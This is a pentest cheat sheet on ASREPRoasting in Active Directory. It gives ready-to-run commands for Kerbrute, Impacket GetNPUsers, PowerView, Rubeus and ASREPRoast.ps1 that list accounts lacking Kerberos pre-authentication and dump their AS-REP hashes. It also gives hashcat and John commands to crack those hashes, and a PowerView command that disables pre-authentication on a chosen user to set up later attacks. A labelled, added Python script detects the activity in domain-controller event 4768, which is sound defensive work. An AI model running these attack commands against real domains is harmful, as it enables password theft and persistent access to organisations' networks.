# ASREPRoast

## Description

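It is possible to obtain the Ticket Granting Ticket (TGT) for any account that has the "Do not require Kerberos pre-authentication" (`DONT_REQ_PREAUTH`) setting enabled. The AS-REP returned for such an account includes data encrypted with a key derived from the account's password, so the password can be attacked offline.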

## Linux/Unix

Enumeration of users with `DONT_REQ_PREAUTH` enabled.

### Kerbrute

```shell
kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists>
```

* \<wordlists> = path to a wordlist of domain usernames.

### Impacket

```shell
GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txt
```

### Hashcat

Cracking the AS-REP.

```shell
hashcat -m 18200 as-rep.txt <path-wordlist>
```

### John the Ripper

Cracking the AS-REP.

```shell
john as-rep.txt --format:krb5asrep --wordlist=<path-wordlist>
```

## Windows

Enumeration of users with `DONT_REQ_PREAUTH` enabled.

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired | select SamAccountName, UserPrincipalName, UserAccountControl | fl

# ActiveDirectory PowerShell module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

Obtaining the AS-REP for a single user.

```powershell
# Rubeus
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat

# ASREPRoast.ps1
Get-ASREPHash -UserName <user> -Verbose
```

Obtaining the AS-REP for all users.

```powershell
# ASREPRoast.ps1
Invoke-ASREPRoast -Verbose
```
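
On the defender's side, the AS-REP requests described above are logged on the domain controller as Security event 4768 with pre-authentication type 0. The following is an added example, not part of the original page: it filters those events and groups them by source address. The JSON-lines export format, the sample records and the `sweep_threshold` value are assumptions.

```python
import json
from collections import defaultdict

# Constructed sample: Security event 4768 ("A Kerberos authentication ticket
# (TGT) was requested") exported as JSON lines. All values are made up.
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.0.99", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "::ffff:10.0.0.99", "PreAuthType": "0", "TicketEncryptionType": "0x00000017", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "legacyapp", "IpAddress": "::ffff:10.0.0.40", "PreAuthType": 0, "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.99", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"}
"""

RC4_HMAC = 0x17  # Kerberos encryption type 23


def parse_events(text):
    """Yield one dict per non-empty JSON line."""
    return (json.loads(line) for line in text.splitlines() if line.strip())


def no_preauth_requests(events):
    """Keep successful TGT requests that were issued without pre-authentication."""
    for ev in events:
        if (ev.get("EventID") == 4768
                and str(ev.get("PreAuthType")) == "0"
                and int(str(ev.get("Status", "0xffffffff")), 16) == 0):
            yield ev


def summarize(events, sweep_threshold=2):
    """Group hits by source address and flag sources that touch several accounts."""
    by_source = defaultdict(lambda: {"accounts": set(), "rc4": False})
    for ev in no_preauth_requests(events):
        src = ev.get("IpAddress", "")
        src = src[7:] if src.startswith("::ffff:") else src  # IPv4-mapped form
        by_source[src]["accounts"].add(ev["TargetUserName"].lower())
        etype = int(str(ev.get("TicketEncryptionType", "0")), 16)
        by_source[src]["rc4"] |= etype == RC4_HMAC
    return {src: {"accounts": sorted(e["accounts"]), "rc4": e["rc4"],
                  "sweep": len(e["accounts"]) >= sweep_threshold}
            for src, e in by_source.items()}


if __name__ == "__main__":
    for source, info in summarize(parse_events(SAMPLE_EVENTS)).items():
        print(source, info)
```

Accounts that legitimately have the flag set produce the same events, so the output is a starting point for review against a known baseline of such accounts.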

Enabling the "Do not require Kerberos pre-authentication" (`DONT_REQ_PREAUTH`) setting for a user.

```powershell
# PowerView
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} -Verbose
```


